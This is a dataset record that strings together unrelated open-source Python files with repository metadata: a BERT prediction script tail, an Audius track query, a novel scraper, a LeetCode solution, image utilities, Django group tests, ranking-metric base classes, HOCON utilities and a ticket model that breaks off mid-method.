output_prediction_file = os.path.join(FLAGS.predict_output_dir,
"predictions.json")
output_nbest_file = os.path.join(FLAGS.predict_output_dir,
"nbest_predictions.json")
output_null_log_odds_file = os.path.join(FLAGS.predict_output_dir,
"null_odds.json")
else:
output_prediction_file = os.path.join(FLAGS.output_dir,
"predictions.json")
output_nbest_file = os.path.join(FLAGS.output_dir,
"nbest_predictions.json")
output_null_log_odds_file = os.path.join(FLAGS.output_dir,
"null_odds.json")
write_predictions(eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file)
if __name__ == "__main__":
flags.mark_flag_as_required("vocab_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
| 36.575896 | 82 | 0.67154 |
ec7ce51b5a9a800ec1e562ae9b96990ed424cf3c | 2,783 | py | Python | discovery-provider/src/queries/get_remixable_tracks.py | csjiang/audius-protocol | 31fb3862ec5bc81f792f991268802d3dcc0ea9f4 | [
"Apache-2.0"
] | 429 | 2019-08-14T01:34:07.000Z | 2022-03-30T06:31:38.000Z | discovery-provider/src/queries/get_remixable_tracks.py | SNOmad1/audius-protocol | 3d5fc2bf688265eb529060f1f3234ef2b95ed231 | [
"Apache-2.0"
] | 998 | 2019-08-14T01:52:37.000Z | 2022-03-31T23:17:22.000Z | discovery-provider/src/queries/get_remixable_tracks.py | SNOmad1/audius-protocol | 3d5fc2bf688265eb529060f1f3234ef2b95ed231 | [
"Apache-2.0"
] | 73 | 2019-10-04T04:24:16.000Z | 2022-03-24T16:27:30.000Z | from sqlalchemy import desc
from sqlalchemy.orm import aliased
from src.models import Track, Stem, AggregateTrack
from src.queries.query_helpers import (
populate_track_metadata,
add_users_to_tracks,
decayed_score,
)
from src.utils.db_session import get_db_read_replica
from src.utils import helpers
def get_remixable_tracks(args):
"""Gets a list of remixable tracks"""
db = get_db_read_replica()
limit = args.get("limit", 25)
current_user_id = args.get("current_user_id", None)
StemTrack = aliased(Track)
with db.scoped_session() as session:
# Subquery to get current tracks that have stems
remixable_tracks_subquery = (
session.query(Track)
.join(Stem, Stem.parent_track_id == Track.track_id)
.join(StemTrack, Stem.child_track_id == StemTrack.track_id)
.filter(
Track.is_current == True,
Track.is_unlisted == False,
Track.is_delete == False,
StemTrack.is_current == True,
StemTrack.is_unlisted == False,
StemTrack.is_delete == False,
)
.distinct(Track.track_id)
.subquery()
)
track_alias = aliased(Track, remixable_tracks_subquery)
count_subquery = session.query(
AggregateTrack.track_id.label("id"),
(AggregateTrack.repost_count + AggregateTrack.save_count).label("count"),
).subquery()
query = (
session.query(
track_alias,
count_subquery.c["count"],
decayed_score(count_subquery.c["count"], track_alias.created_at).label(
"score"
),
)
.join(
count_subquery,
count_subquery.c["id"] == track_alias.track_id,
)
.order_by(desc("score"), desc(track_alias.track_id))
.limit(limit)
)
results = query.all()
tracks = []
for result in results:
track = result[0]
score = result[-1]
track = helpers.model_to_dictionary(track)
track["score"] = score
tracks.append(track)
track_ids = list(map(lambda track: track["track_id"], tracks))
# Get user specific data for tracks
tracks = populate_track_metadata(session, track_ids, tracks, current_user_id)
if args.get("with_users", False):
add_users_to_tracks(session, tracks, current_user_id)
else:
# Remove the user from the tracks
tracks = [
{key: val for key, val in dict.items() if key != "user"}
for dict in tracks
]
return tracks
| 32.360465 | 87 | 0.575278 |
4798b8138753f02d235e2640cb57a555f8610b60 | 888 | py | Python | util/parser.py | zlasd/novelS | 44905ec0477806f8aee377e098d4311d65aabd18 | [
"MIT"
] | 1 | 2021-06-07T08:18:56.000Z | 2021-06-07T08:18:56.000Z | util/parser.py | zlasd/novelS | 44905ec0477806f8aee377e098d4311d65aabd18 | [
"MIT"
] | null | null | null | util/parser.py | zlasd/novelS | 44905ec0477806f8aee377e098d4311d65aabd18 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from util import log
def find_chap_list(content: str, link_format="{}", format_map={}, list_class="listmain", ignore_chap=0):
soup = BeautifulSoup(content, 'html.parser')
tag_main_list = soup.find(class_=list_class)
tag_chap_list = tag_main_list.find_all('a')
ret = []
for a in tag_chap_list[ignore_chap:]:
link = a.get("href")
if link is not None:
format_map["chap_id"] = link
title = ' '.join(a.string.split())
ret.append((link_format.format(**format_map), title))
log.log_info(ret)
return ret
def parse_content(text: str, txt_class="showtxt") -> str:
soup = BeautifulSoup(text, 'html.parser')
tag_txt = soup.find(class_=txt_class)
phase_list = []
for s in tag_txt.stripped_strings:
phase_list.append(s)
return '\n\n'.join(phase_list[:-1])
| 28.645161 | 104 | 0.647523 |
7e103a70ea1927e93815205499d882c1be64e83d | 921 | py | Python | string/0227_basic_calculator_ii/0227_basic_calculator_ii.py | zdyxry/LeetCode | 33371285d0f3302158230f46e8b1b63b9f4639c4 | [
"Xnet",
"X11"
] | 6 | 2019-09-16T01:50:44.000Z | 2020-09-17T08:52:25.000Z | string/0227_basic_calculator_ii/0227_basic_calculator_ii.py | zdyxry/LeetCode | 33371285d0f3302158230f46e8b1b63b9f4639c4 | [
"Xnet",
"X11"
] | null | null | null | string/0227_basic_calculator_ii/0227_basic_calculator_ii.py | zdyxry/LeetCode | 33371285d0f3302158230f46e8b1b63b9f4639c4 | [
"Xnet",
"X11"
] | 4 | 2020-02-07T12:43:16.000Z | 2021-04-11T06:38:55.000Z | class Solution(object):
def calculate(self, s):
if not s:
return "0"
stack, num, sign = [], 0, "+"
for i in xrange(len(s)):
if s[i].isdigit():
num = num*10 + ord(s[i])-ord("0")
if (not s[i].isdigit() and not s[i].isspace()) or i == len(s) - 1:
if sign == "-":
stack.append(-num)
elif sign == "+":
stack.append(num)
elif sign == "*":
stack.append(stack.pop()*num)
else:
tmp = stack.pop()
if tmp//num < 0 and tmp % num != 0:
stack.append(tmp//num+1)
else:
stack.append(tmp//num)
sign = s[i]
num = 0
return sum(stack)
s = "3+2*2"
res = Solution().calculate(s)
print(res) | 31.758621 | 78 | 0.374593 |
01059c955ac21721c14181997735f11a9036368e | 1,570 | py | Python | util/util_imageIO.py | google/dynamic-video-depth | 7dab8f9e156fa35735301695ea020aee7221fb31 | [
"Apache-2.0"
] | 144 | 2021-08-09T21:05:57.000Z | 2022-03-30T17:37:43.000Z | util/util_imageIO.py | vedaldi/dynamic-video-depth | 274f5f59604a10121a2445f7b30df4a9ff075946 | [
"Apache-2.0"
] | 11 | 2021-08-17T13:58:55.000Z | 2022-03-28T08:12:29.000Z | util/util_imageIO.py | vedaldi/dynamic-video-depth | 274f5f59604a10121a2445f7b30df4a9ff075946 | [
"Apache-2.0"
] | 20 | 2021-08-12T13:51:35.000Z | 2022-03-13T22:33:50.000Z | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from PIL import Image
import numpy as np
from skimage.transform import resize as imresize
def read_image(path, load_alpha=False):
im = np.asarray(Image.open(path))
dims = len(im.shape)
if dims == 2:
return im
elif dims == 3:
if im.shape[-1] == 3:
return im
elif load_alpha:
return im
else:
return im[..., :3]
else:
raise ValueError(f'invalid dimensions encoutered. Only except dims 2,3 but encoutered {dims}')
def resize_image(im, size=None, scale=None):
H, W = im.shape[:2]
if scale:
th = H // scale
tw = W // scale
s = (th, tw)
else:
s = size
im = imresize(im, s)
return im
def hwc2chw(im):
dims = len(im.shape)
if dims == 2:
return im[None, ...]
elif dims == 3:
return np.transpose(im, (2, 0, 1))
else:
raise ValueError(f'invalid dimensions encoutered. Only except dims 2,3 but encoutered {dims}')
| 28.035714 | 102 | 0.636306 |
d5435a10da95de18d3f3a53ad7e5e0597ac5b50e | 6,950 | py | Python | apps/groups/tests/test_views.py | storagebot/kitsune | 613ba2ca09104f330ab77088b452391169096249 | [
"BSD-3-Clause"
] | 2 | 2019-08-19T17:08:47.000Z | 2019-10-05T11:37:02.000Z | apps/groups/tests/test_views.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | apps/groups/tests/test_views.py | taliasman/kitsune | f8085205eef143011adb4c52d1f183da06c1c58e | [
"BSD-3-Clause"
] | null | null | null | import os
from django.core.files import File
from nose.tools import eq_
from groups.models import GroupProfile
from groups.tests import group_profile
from sumo.helpers import urlparams
from sumo.tests import TestCase
from sumo.urlresolvers import reverse
from users.tests import user, group, add_permission
class EditGroupProfileTests(TestCase):
def setUp(self):
super(EditGroupProfileTests, self).setUp()
self.user = user(save=True)
self.group_profile = group_profile(group=group(save=True), save=True)
self.client.login(username=self.user.username, password='testpass')
def _verify_get_and_post(self):
slug = self.group_profile.slug
# Verify GET
r = self.client.get(reverse('groups.edit', args=[slug]), follow=True)
eq_(r.status_code, 200)
# Verify POST
r = self.client.post(reverse('groups.edit', locale='en-US',
args=[slug]),
{'information': '=new info='})
eq_(r.status_code, 302)
gp = GroupProfile.uncached.get(slug=slug)
eq_(gp.information, '=new info=')
def test_edit_with_perm(self):
add_permission(self.user, GroupProfile, 'change_groupprofile')
self._verify_get_and_post()
def test_edit_as_leader(self):
self.group_profile.leaders.add(self.user)
self._verify_get_and_post()
def test_edit_without_perm(self):
slug = self.group_profile.slug
# Try GET
r = self.client.get(reverse('groups.edit', args=[slug]), follow=True)
eq_(r.status_code, 403)
# Try POST
r = self.client.post(reverse('groups.edit', locale='en-US',
args=[slug]),
{'information': '=new info='})
eq_(r.status_code, 403)
class EditAvatarTests(TestCase):
def setUp(self):
super(EditAvatarTests, self).setUp()
self.user = user(save=True)
add_permission(self.user, GroupProfile, 'change_groupprofile')
self.group_profile = group_profile(group=group(save=True), save=True)
self.client.login(username=self.user.username, password='testpass')
def tearDown(self):
if self.group_profile.avatar:
self.group_profile.avatar.delete()
super(EditAvatarTests, self).tearDown()
def test_upload_avatar(self):
"""Upload a group avatar."""
with open('apps/upload/tests/media/test.jpg') as f:
self.group_profile.avatar.save('test_old.jpg', File(f), save=True)
assert self.group_profile.avatar.name.endswith('92b516.jpg')
old_path = self.group_profile.avatar.path
assert os.path.exists(old_path), 'Old avatar is not in place.'
url = reverse('groups.edit_avatar', locale='en-US',
args=[self.group_profile.slug])
with open('apps/upload/tests/media/test.jpg') as f:
r = self.client.post(url, {'avatar': f})
eq_(302, r.status_code)
url = reverse('groups.profile', args=[self.group_profile.slug])
eq_('http://testserver/en-US' + url, r['location'])
assert not os.path.exists(old_path), 'Old avatar was not removed.'
def test_delete_avatar(self):
"""Delete a group avatar."""
self.test_upload_avatar()
url = reverse('groups.delete_avatar', locale='en-US',
args=[self.group_profile.slug])
r = self.client.get(url)
eq_(200, r.status_code)
r = self.client.post(url)
eq_(302, r.status_code)
url = reverse('groups.profile', args=[self.group_profile.slug])
eq_('http://testserver/en-US' + url, r['location'])
gp = GroupProfile.uncached.get(slug=self.group_profile.slug)
eq_('', gp.avatar.name)
class AddRemoveMemberTests(TestCase):
def setUp(self):
super(AddRemoveMemberTests, self).setUp()
self.user = user(save=True)
self.member = user(save=True)
add_permission(self.user, GroupProfile, 'change_groupprofile')
self.group_profile = group_profile(group=group(save=True), save=True)
self.client.login(username=self.user.username, password='testpass')
def test_add_member(self):
url = reverse('groups.add_member', locale='en-US',
args=[self.group_profile.slug])
r = self.client.get(url)
eq_(405, r.status_code)
r = self.client.post(url, {'users': self.member.username})
eq_(302, r.status_code)
assert self.member in self.group_profile.group.user_set.all()
def test_remove_member(self):
self.member.groups.add(self.group_profile.group)
url = reverse('groups.remove_member', locale='en-US',
args=[self.group_profile.slug, self.member.id])
r = self.client.get(url)
eq_(200, r.status_code)
r = self.client.post(url)
eq_(302, r.status_code)
assert not self.member in self.group_profile.group.user_set.all()
class AddRemoveLeaderTests(TestCase):
def setUp(self):
super(AddRemoveLeaderTests, self).setUp()
self.user = user(save=True)
add_permission(self.user, GroupProfile, 'change_groupprofile')
self.leader = user(save=True)
self.group_profile = group_profile(group=group(save=True), save=True)
self.client.login(username=self.user.username, password='testpass')
def test_add_leader(self):
url = reverse('groups.add_leader', locale='en-US',
args=[self.group_profile.slug])
r = self.client.get(url)
eq_(405, r.status_code)
r = self.client.post(url, {'users': self.leader.username})
eq_(302, r.status_code)
assert self.leader in self.group_profile.leaders.all()
def test_remove_member(self):
self.group_profile.leaders.add(self.leader)
url = reverse('groups.remove_leader', locale='en-US',
args=[self.group_profile.slug, self.leader.id])
r = self.client.get(url)
eq_(200, r.status_code)
r = self.client.post(url)
eq_(302, r.status_code)
assert not self.leader in self.group_profile.leaders.all()
class JoinContributorsTests(TestCase):
def setUp(self):
super(JoinContributorsTests, self).setUp()
self.user = user(save=True)
self.client.login(username=self.user.username, password='testpass')
group(name='Contributors', save=True)
def test_join_contributors(self):
next = reverse('groups.list')
url = reverse('groups.join_contributors', locale='en-US')
url = urlparams(url, next=next)
r = self.client.get(url)
eq_(405, r.status_code)
r = self.client.post(url)
eq_(302, r.status_code)
eq_('http://testserver%s' % next, r['location'])
assert self.user.groups.filter(name='Contributors').exists()
| 39.265537 | 78 | 0.63223 |
6765f3048b69f9823d05eedd7cc73f51d29a31bb | 825 | py | Python | bayes_nn/models/base_model.py | rnagumo/bayes_nn | 3a6ee31d1dcc9a7f8d2dfb0aadf180c443915931 | [
"MIT"
] | null | null | null | bayes_nn/models/base_model.py | rnagumo/bayes_nn | 3a6ee31d1dcc9a7f8d2dfb0aadf180c443915931 | [
"MIT"
] | null | null | null | bayes_nn/models/base_model.py | rnagumo/bayes_nn | 3a6ee31d1dcc9a7f8d2dfb0aadf180c443915931 | [
"MIT"
] | null | null | null | from torch import Tensor, nn
class BaseModel(nn.Module):
def forward(self, x: Tensor) -> tuple[Tensor, Tensor]:
"""Forward pass to calculate target.
Args:
x: Input features.
Returns:
Tuple of `(mean, var)` of prediction.
"""
raise NotImplementedError
def sample(self, x: Tensor) -> Tensor:
"""Sample targets with Monte Carlo sampling.
Args:
Predctions with Monte Carlo sampling in 1st dimension.
"""
raise NotImplementedError
def loss_func(self, x: Tensor, y: Tensor) -> dict[str, Tensor]:
"""Loss function.
Args:
x: Features.
y: Targets.
Returns:
Dict of losses in shape of `(batch,)`.
"""
raise NotImplementedError
| 21.710526 | 67 | 0.550303 |
5ea121614078a1b9eebec913039231eec7bed0a4 | 5,347 | py | Python | pyltr/metrics/_metrics.py | rit-git/pyltr | c18e24fc18a1099ee3cac06b71d09f09545458bb | [
"BSD-3-Clause"
] | null | null | null | pyltr/metrics/_metrics.py | rit-git/pyltr | c18e24fc18a1099ee3cac06b71d09f09545458bb | [
"BSD-3-Clause"
] | null | null | null | pyltr/metrics/_metrics.py | rit-git/pyltr | c18e24fc18a1099ee3cac06b71d09f09545458bb | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from sklearn.externals.six.moves import range
from ..util.group import check_qids, get_groups
from ..util.sort import get_sorted_y
class Metric(object):
"""Base LTR metric class.
Subclasses must override evaluate() and can optionally override various
other methods.
"""
def evaluate(self, qid, targets):
"""Evaluates the metric on a ranked list of targets.
Parameters
----------
qid : object
Query id. Guaranteed to be a hashable type s.t.
``sorted(targets1) == sorted(targets2)`` iff ``qid1 == qid2``.
targets : array_like of shape = [n_targets]
List of targets for the query, in order of predicted score.
Returns
-------
float
Value of the metric on the provided list of targets.
"""
raise NotImplementedError()
def calc_swap_deltas(self, qid, targets):
"""Returns an upper triangular matrix.
Each (i, j) contains the change in the metric from swapping
targets[i, j].
Parameters
----------
qid : object
See `evaluate`.
targets : array_like of shape = [n_targets]
See `evaluate`.
Returns
-------
deltas = array_like of shape = [n_targets, n_targets]
Upper triangular matrix, where ``deltas[i, j]`` is the change in
the metric from swapping ``targets[i]`` with ``targets[j]``.
"""
n_targets = len(targets)
deltas = np.zeros((n_targets, n_targets))
original = self.evaluate(qid, targets)
max_k = self.max_k()
if max_k is None or n_targets < max_k:
max_k = n_targets
for i in range(max_k):
for j in range(i + 1, n_targets):
tmp = targets[i]
targets[i] = targets[j]
targets[j] = tmp
deltas[i, j] = self.evaluate(qid, targets) - original
tmp = targets[i]
targets[i] = targets[j]
targets[j] = tmp
return deltas
def max_k(self):
"""Returns a cutoff value for the metric.
Returns
-------
k : int or None
Value for which ``swap_delta()[i, j] == 0 for all i, j >= k``.
None if no such value.
"""
return None
def evaluate_preds(self, qid, targets, preds):
"""Evaluates the metric on a ranked list of targets.
Parameters
----------
qid : object
See `evaluate`.
targets : array_like of shape = [n_targets]
See `evaluate`.
preds : array_like of shape = [n_targets]
List of predicted scores corresponding to the targets. The
`targets` array will be sorted by these predictions before
evaluation.
Returns
-------
float
Value of the metric on the provided list of targets and
predictions.
"""
return self.evaluate(qid, get_sorted_y(targets, preds))
def calc_random_ev(self, qid, targets):
"""Calculates the expectied value of the metric on randomized targets.
This implementation just averages the metric over 100 shuffles.
Parameters
----------
qid : object
See `evaluate`.
targets : array_like of shape = [n_targets]
See `evaluate`.
Returns
-------
float
Expected value of the metric from random ordering of targets.
"""
targets = np.copy(targets)
scores = []
for _ in range(100):
np.random.shuffle(targets)
scores.append(self.evaluate(qid, targets))
return np.mean(scores)
def calc_mean(self, qids, targets, preds):
"""Calculates the mean of the metric among the provided predictions.
Parameters
----------
qids : array_like of shape = [n_targets]
List of query ids. They must be grouped contiguously
(i.e. ``pyltr.util.group.check_qids`` must pass).
targets : array_like of shape = [n_targets]
List of targets.
preds : array_like of shape = [n_targets]
List of predicted scores corresponding to the targets.
Returns
-------
float
Mean of the metric over provided query groups.
"""
check_qids(qids)
query_groups = get_groups(qids)
return np.mean([self.evaluate_preds(qid, targets[a:b], preds[a:b])
for qid, a, b in query_groups])
def calc_mean_random(self, qids, targets):
"""Calculates the EV of the mean of the metric with random ranking.
Parameters
----------
qids : array_like of shape = [n_targets]
See `calc_mean`.
targets : array_like of shape = [n_targets]
See `calc_mean`.
Returns
-------
float
Expected value of the mean of the metric on random orderings of the
provided query groups.
"""
check_qids(qids)
query_groups = get_groups(qids)
return np.mean([self.calc_random_ev(qid, targets[a:b])
for qid, a, b in query_groups])
| 30.20904 | 79 | 0.552459 |
c9ab3257341041275cba3422d1e31953485173c5 | 1,534 | py | Python | vega/algorithms/nas/modnas/estim/dist_backend/base.py | shaido987/vega | 14d5d49fb8bdf96bd1f3fcfac201ce6b6712c3b6 | [
"MIT"
] | 1 | 2021-05-08T07:47:44.000Z | 2021-05-08T07:47:44.000Z | vega/algorithms/nas/modnas/estim/dist_backend/base.py | WholeG/vega | d1ccf1c3ce68a118bdb6775594ceed0f895911e7 | [
"MIT"
] | null | null | null | vega/algorithms/nas/modnas/estim/dist_backend/base.py | WholeG/vega | d1ccf1c3ce68a118bdb6775594ceed0f895911e7 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Distributed remote client and server."""
import threading
class RemoteBase():
"""Distributed remote client class."""
def __init__(self):
super().__init__()
self.on_done = None
self.on_failed = None
def call(self, func, *args, on_done=None, on_failed=None, **kwargs):
"""Call function on remote client with callbacks."""
self.on_done = on_done
self.on_failed = on_failed
self.th_rpc = threading.Thread(target=self.rpc, args=(func,) + args, kwargs=kwargs)
self.th_rpc.start()
def rpc(self, func, *args, **kwargs):
"""Call function on remote client."""
raise NotImplementedError
def on_rpc_done(self, ret):
"""Invoke callback when remote call finishes."""
self.ret = ret
self.on_done(ret)
def on_rpc_failed(self, ret):
"""Invoke callback when remote call fails."""
self.on_failed(ret)
class WorkerBase():
"""Distributed remote worker (server) class."""
def run(self, estim):
"""Run worker."""
raise NotImplementedError
| 30.078431 | 91 | 0.656454 |
5deabb197de5178e0fc51d7afd905b317e49c586 | 2,446 | py | Python | hocon/util.py | chris-martin/hocon-python | 4d94595d531ef8cd69a086dbb5cb65550d8d456e | [
"Apache-2.0"
] | 3 | 2017-01-23T09:16:09.000Z | 2018-06-06T17:00:35.000Z | hocon/util.py | chris-martin/hocon-python | 4d94595d531ef8cd69a086dbb5cb65550d8d456e | [
"Apache-2.0"
] | null | null | null | hocon/util.py | chris-martin/hocon-python | 4d94595d531ef8cd69a086dbb5cb65550d8d456e | [
"Apache-2.0"
] | 1 | 2019-03-21T01:55:47.000Z | 2019-03-21T01:55:47.000Z | """
Contains static utility methods.
"""
from .impl import util as impl_util
def quote_string(s):
"""
public static String quoteString(String s)
* Quotes and escapes a string, as in the JSON specification.
*
* @param s
* a string
* @return the string quoted and escaped
*/
"""
return impl_util.render_json_string(s)
def join_path(*elements):
"""
public static String joinPath(String... elements)
* Converts a list of keys to a path expression, by quoting the path
* elements as needed and then joining them separated by a period. A path
* expression is usable with a {@link Config}, while individual path
* elements are usable with a {@link ConfigObject}.
* <p>
* See the overview documentation for {@link Config} for more detail on path
* expressions vs. keys.
*
* @param elements
* the keys in the path
* @return a path expression
* @throws ConfigException
* if there are no elements
public static String joinPath(List<String> elements)
* Converts a list of strings to a path expression, by quoting the path
* elements as needed and then joining them separated by a period. A path
* expression is usable with a {@link Config}, while individual path
* elements are usable with a {@link ConfigObject}.
* <p>
* See the overview documentation for {@link Config} for more detail on path
* expressions vs. keys.
*
* @param elements
* the keys in the path
* @return a path expression
* @throws ConfigException
* if the list is empty
"""
return impl_util.join_path(elements)
def split_path(path):
"""
public static List<String> splitPath(String path)
* Converts a path expression into a list of keys, by splitting on period
* and unquoting the individual path elements. A path expression is usable
* with a {@link Config}, while individual path elements are usable with a
* {@link ConfigObject}.
* <p>
* See the overview documentation for {@link Config} for more detail on path
* expressions vs. keys.
*
* @param path
* a path expression
* @return the individual keys in the path
* @throws ConfigException
* if the path expression is invalid
"""
return impl_util.split_path(path)
| 31.358974 | 80 | 0.638185 |
c8024bb909c24855dbf1b7a05c149e764b775382 | 13,382 | py | Python | livestyled/models/ticket.py | livestyled/python-sdk | e75263e8bbf7132e4ce0e69d0ca3ad19088661b2 | [
"MIT"
] | null | null | null | livestyled/models/ticket.py | livestyled/python-sdk | e75263e8bbf7132e4ce0e69d0ca3ad19088661b2 | [
"MIT"
] | 1 | 2020-05-21T10:01:07.000Z | 2020-05-21T10:01:07.000Z | livestyled/models/ticket.py | livestyled/python-sdk | e75263e8bbf7132e4ce0e69d0ca3ad19088661b2 | [
"MIT"
] | null | null | null | from livestyled.models.app import Currency
from livestyled.models.event import Event, EventDate
from livestyled.models.ticket_integration import TicketIntegration
from livestyled.models.user import User
from livestyled.models.venue import Venue
class Ticket:
def __init__(
self,
id,
external_ticket_id,
external_movement_id,
seat,
qr_code_url,
title,
legacy_external_event_id,
external_event_id,
barcode,
sector_name,
venue_name,
venue_room,
client_name,
premium,
client_email,
price,
share_link,
external_customer_ref,
entrance,
section,
row,
price_code,
created_at,
updated_at,
user_id,
status,
session_date=None,
can_share=False,
sharer_email=None,
sharer_id=None,
redeemed_at=None,
redeemer_id=None,
share_code=None,
redeemer_email=None,
parent_ticket=None,
shared_at=None,
legal_long_text=None,
legal_short_text=None,
map_url=None,
map_image_url=None,
ticket_integration=None,
venue=None,
event=None,
ticket_auth=None,
event_date=None,
currency=None,
external_card_ref=None,
additional_fields=None
):
self.id = id
self.external_ticket_id = external_ticket_id
self.external_movement_id = external_movement_id
self.seat = seat
self.qr_code_url = qr_code_url
self.session_date = session_date
self.title = title
self.legacy_external_event_id = legacy_external_event_id
self.external_event_id = external_event_id
self.barcode = barcode
self.sector_name = sector_name
self.venue_name = venue_name
self.venue_room = venue_room
self.client_name = client_name
self.premium = premium
self.client_email = client_email
self.price = price
self.created_at = created_at
self.updated_at = updated_at
self.share_link = share_link
self.external_customer_ref = external_customer_ref
self.entrance = entrance
self.section = section
self.row = row
self.price_code = price_code
if user_id:
self._user = User.placeholder(id=user_id)
else:
self._user = None
self.status = status
self.can_share = can_share
self.sharer_email = sharer_email
self.redeemed_at = redeemed_at
self.share_code = share_code
self.redeemer_email = redeemer_email
self.shared_at = shared_at
self.external_card_ref = external_card_ref
if sharer_id:
self._sharer = User.placeholder(id=sharer_id)
else:
self._sharer = None
if redeemer_id:
self._redeemer = User.placeholder(id=redeemer_id)
else:
self._redeemer = None
if parent_ticket:
if isinstance(parent_ticket, dict):
self._parent_ticket = Ticket(**parent_ticket)
elif isinstance(parent_ticket, (int, str)):
self._parent_ticket = Ticket.placeholder(id=int(parent_ticket))
else:
self._parent_ticket = None
self.legal_long_text = legal_long_text
self.legal_short_text = legal_short_text
self.map_url = map_url
self.map_image_url = map_image_url
if ticket_integration:
if isinstance(ticket_integration, dict):
self._ticket_integration = TicketIntegration(**ticket_integration)
elif isinstance(ticket_integration, (int, str)):
self._ticket_integration = TicketIntegration.placeholder(ticket_integration)
elif isinstance(ticket_integration, TicketIntegration):
self._ticket_integration = ticket_integration
else:
self._ticket_integration = None
if event:
if isinstance(event, Event):
self.event = event
elif isinstance(event, (int, str)):
self.event = Event.placeholder(id=event)
elif isinstance(event, dict):
self.event = Event(**event)
else:
self.event = None
if event_date:
if isinstance(event_date, EventDate):
self.event_date = event_date
elif isinstance(event_date, (int, str)):
self.event_date = EventDate.placeholder(id=event_date)
elif isinstance(event_date, dict):
self.event_date = EventDate(**event_date)
else:
self.event_date = None
if venue:
if isinstance(venue, Venue):
self.venue = venue
elif isinstance(venue, (int, str)):
self.venue = Venue.placeholder(id=venue)
elif isinstance(venue, dict):
self.venue = Venue(**venue)
else:
self.venue = None
if currency:
if isinstance(currency, Currency):
self.currency = currency
elif isinstance(currency, (int, str)):
self.currency = Currency.placeholder(id=currency)
elif isinstance(currency, dict):
self.currency = Currency(**currency)
else:
self.currency = None
self.additional_fields = additional_fields
@classmethod
def placeholder(
cls,
id
):
return cls(
id=id,
external_ticket_id=None,
external_movement_id=None,
seat=None,
qr_code_url=None,
title=None,
legacy_external_event_id=None,
external_event_id=None,
barcode=None,
sector_name=None,
venue_name=None,
venue_room=None,
client_name=None,
premium=None,
client_email=None,
price=None,
share_link=None,
external_customer_ref=None,
entrance=None,
section=None,
row=None,
price_code=None,
created_at=None,
updated_at=None,
user_id=None,
status=None,
session_date=None,
can_share=False,
sharer_email=None,
sharer_id=None,
redeemed_at=None,
redeemer_id=None,
share_code=None,
redeemer_email=None,
parent_ticket=None,
shared_at=None,
legal_long_text=None,
legal_short_text=None,
map_url=None,
map_image_url=None,
ticket_integration=None,
venue=None,
event=None,
currency=None,
external_card_ref=None,
additional_fields=None,
)
@classmethod
def create_new(
cls,
user: User or str or int,
external_ticket_id=None,
external_movement_id=None,
seat=None,
qr_code_url=None,
session_date=None,
title=None,
legacy_external_event_id=None,
external_event_id=None,
barcode=None,
sector_name=None,
venue_name=None,
venue_room=None,
client_name=None,
premium=False,
client_email=None,
price=0,
row=None,
section=None,
share_link=None,
external_customer_ref=None,
price_code=None,
entrance=None,
status=None,
can_share=False,
sharer_email=None,
sharer: User or str or int or None = None,
redeemed_at=None,
redeemer: User or str or int or None = None,
share_code=None,
redeemer_email=None,
parent_ticket=None,
shared_at=None,
legal_long_text=None,
legal_short_text=None,
map_url=None,
map_image_url=None,
ticket_integration=None,
venue: Venue or str or int or None = None,
event: Event or str or int or None = None,
currency: Currency or None = None,
external_card_ref=None,
additional_fields=None,
):
ticket = Ticket(
id=None,
external_ticket_id=external_ticket_id,
external_movement_id=external_movement_id,
seat=seat,
qr_code_url=qr_code_url,
session_date=session_date,
title=title,
legacy_external_event_id=legacy_external_event_id,
external_event_id=external_event_id,
barcode=barcode,
sector_name=sector_name,
venue_name=venue_name,
venue_room=venue_room,
client_name=client_name,
premium=premium,
client_email=client_email,
price=price,
created_at=None,
updated_at=None,
share_link=share_link,
external_customer_ref=external_customer_ref,
entrance=entrance,
section=section,
row=row,
price_code=price_code,
user_id=None,
status=status,
can_share=can_share,
sharer_email=sharer_email,
sharer_id=None,
redeemed_at=redeemed_at,
redeemer_id=None,
share_code=share_code,
redeemer_email=redeemer_email,
parent_ticket=None,
shared_at=shared_at,
legal_long_text=legal_long_text,
legal_short_text=legal_short_text,
map_url=map_url,
map_image_url=map_image_url,
ticket_integration=ticket_integration,
venue=venue,
event=event,
currency=currency,
external_card_ref=external_card_ref,
additional_fields=additional_fields
)
if isinstance(user, (str, int)):
user = User.placeholder(id=user)
ticket._user = user
if isinstance(sharer, (str or int)):
sharer = User.placeholder(id=sharer)
ticket._sharer = sharer
if isinstance(redeemer, (str or int)):
redeemer = User.placeholder(id=redeemer)
ticket._redeemer = redeemer
if isinstance(parent_ticket, (str or int)):
parent_ticket = Ticket.placeholder(id=parent_ticket)
ticket._parent_ticket = parent_ticket
return ticket
@property
def user_id(self):
if self._user:
return self._user.id
else:
return None
@property
def user(self):
return self._user
@property
def redeemer_id(self):
if self._redeemer:
return self._redeemer.id
else:
return None
@property
def redeemer(self):
return self._redeemer
@property
def sharer_id(self):
if self._sharer:
return self._sharer.id
else:
return None
@property
def sharer(self):
return self._sharer
@property
def parent_ticket(self):
return self._parent_ticket
@property
def ticket_integration(self):
return self._ticket_integration
def __repr__(self):
return '<Ticket(id={self.id!r})>'.format(self=self)
def diff(self, other):
differences = {}
fields = (
'external_ticket_id', 'seat', 'qr_code_url', 'session_date', 'title', 'legacy_external_event_id',
'external_event_id', 'barcode', 'sector_name', 'venue_name', 'venue_room', 'client_name', 'premium',
